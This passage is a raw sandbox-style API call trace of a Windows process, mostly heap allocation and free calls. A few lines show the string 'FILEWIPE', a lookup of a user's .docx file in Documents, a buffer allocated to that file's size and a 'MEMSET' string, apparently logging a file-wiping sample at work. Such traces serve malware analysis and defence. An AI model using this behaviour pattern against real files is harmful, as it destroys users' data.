lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0175.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0175.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0175.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0175.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0175.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0175.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0175.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0175.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0175.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0175.938] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0175.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0175.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0175.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0175.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0175.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0175.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0175.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0175.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0175.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0175.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0175.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0175.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0175.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0175.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0175.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0175.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0175.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0175.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0175.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0175.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0175.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0175.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0175.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0175.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0175.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0175.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0175.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0175.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0175.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0175.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0175.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0175.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0175.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0175.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0175.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0175.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0175.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0175.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0175.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0175.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0175.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0175.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0175.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0175.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0175.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0175.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0175.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0175.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0175.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0175.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0175.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0175.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0175.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0175.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0175.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0175.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0175.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0175.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0175.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0175.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0175.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0175.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0175.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0175.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0175.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0175.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0175.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0175.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0175.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0175.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0175.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0175.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0175.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0175.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0175.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0175.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0175.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0175.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0175.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0175.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0175.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0175.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0175.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0175.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0175.943] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0175.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0175.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0175.943] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0175.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0175.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0175.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0175.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1900 [0175.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0175.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0175.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0175.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0175.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0175.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9b68 [0175.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0175.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0175.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0175.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0175.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0175.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0175.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0175.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0175.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0175.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0175.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0175.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0175.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0175.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0175.944] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0175.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0175.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0175.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0175.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0175.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0175.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0175.944] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oLilEMGSHp90H.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\olilemgshp90h.docx")) returned 0x20 [0175.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0175.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0175.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0175.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0175.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0175.948] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0175.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0175.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0175.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0175.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0175.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0175.948] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oLilEMGSHp90H.docx", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa71df400, ftCreationTime.dwHighDateTime=0x1d5e683, ftLastAccessTime.dwLowDateTime=0xba16f910, ftLastAccessTime.dwHighDateTime=0x1d59824, ftLastWriteTime.dwLowDateTime=0xba16f910, ftLastWriteTime.dwHighDateTime=0x1d59824, nFileSizeHigh=0x0, nFileSizeLow=0x6cc4, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="oLilEMGSHp90H.docx", cAlternateFileName="OLILEM~1.DOC")) returned 0x90ae18 [0175.949] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0175.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0175.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0175.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0175.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0175.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0175.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0175.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0175.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0175.950] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0175.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0175.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0175.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0175.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0175.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0175.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0175.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0175.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0175.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0175.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0175.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0175.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0175.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0175.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0175.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0175.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0175.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0175.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0175.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0175.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0175.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0175.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0175.951] CharLowerBuffW (in: lpsz="byte[27844]", cchLength=0xb | out: lpsz="byte[27844]") returned 0xb [0175.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0175.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0175.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0175.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0175.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0175.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0175.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0175.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0175.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0175.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0175.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0175.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0175.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0175.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0175.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0175.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0175.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x6cc4) returned 0xa5f008 [0175.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0175.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0175.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0175.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0175.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0175.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0175.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0175.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0175.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0175.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0175.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0175.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0175.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0175.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc198 [0175.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0175.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0175.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0175.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0175.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0175.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0175.953] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0175.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0175.953] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0175.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0175.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0175.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0175.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1770 [0175.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0175.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 